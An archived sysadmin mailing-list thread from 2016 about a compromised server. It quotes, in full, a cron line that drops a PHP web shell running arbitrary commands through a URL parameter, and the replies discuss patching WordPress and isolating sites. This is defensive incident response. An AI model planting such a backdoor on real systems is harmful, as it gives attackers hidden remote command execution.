[Systems] Found a backdoor

[Samuel Cantero]

On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org> wrote:

> On 02/25/2016 04:09 AM, Sebastian Silva wrote:
> > Remember in June we had an incident with a broken Wordpress site.
> > I switched to static generator since then.
> >
> > +1 on containers just learning more about them and finding them
> fascinating.
> > Count me in on containerizing everything.
> >
> > I'm not aware of other wordpress sites. Maybe walter's blog?
> > Wordpress is a PIA IMHO.
>
> Yes, WP is riddled with security holes. Back in October, Samuel helped
> Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
> that the WP instance now fully patched and locked down?
>

The WP version on walterbender.org site is 4.3.1. The WP last version is
4.4.2. I have checked the WP change log and we can find this:

4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
scripting vulnerability that could allow a site to be compromised.

4.4.2 => WordPress versions 4.4.1 and earlier are affected by two security
issues: a possible SSRF for certain local URIs, and an open redirection
attack.

This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
Significant information on the release notes:

   - Pre-emptive security improvements to ensure that the Akismet plugin
   can't be used by attackers to compromise a WordPress installation.
   - Closes a potential XSS vulnerability.

Of course, every version has a lot of bug fixes. We definitely should
upgrade it and test nothing breaks walterbender.org site.

Who is in charge of upgrading the others WP sites?

Regards,

Samuel C.


>
>
> > Regards,
> > Sebastian
> >
> >
> > On 25/02/16 04:47, Bernie Innocenti wrote:
> >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i found
> >> that www-data was executing commands like these:
> >>
> >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
> >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
> >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
> >>
> >> Did you spot the system()? This executes arbitrary commands specified
> >> via the "localtime" url parameter. Uh-oh.
> >>
> >> There were about a dozen lines like the above, installing .cache.php in
> >> various virtualhosts. I kept a copy of the file in
> >> /root/www-data.backdoor. The file was last written on Jun 23  2015,
> >> which may correlate with the switch to the new website.
> >>
> >> I cleared the mess and searched the logs for requests containing
> >> "localtime", but couldn't find any. I wonder if they could filter the
> >> logs, since they were previously writable by www-data.
> >>
> >> Please watch out. We should ensure directories accessible over http are
> >> not writable by user www-data, especially those in which PHP and CGIs
> >> are enabled.
> >>
> >> Running several large sites under the same uid has always been a bad
> >> security practice, and looking forward we should keep migrating them to
> >> properly isolated containers.
> >>
> >> Finally, Wordpress is particularly dangerous and we should update and
> >> harden all instances. Can someone please take care of this? I'll do
> >> Mediawiki, which I know pretty well.
> >>
> >
>
>
> --
>  _ // Bernie Innocenti
>  \X/  http://codewiz.org
> _______________________________________________
> Systems mailing list
> Systems at lists.sugarlabs.org
> http://lists.sugarlabs.org/listinfo/systems
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.sugarlabs.org/archive/systems/attachments/20160301/d0b8f294/attachment.html>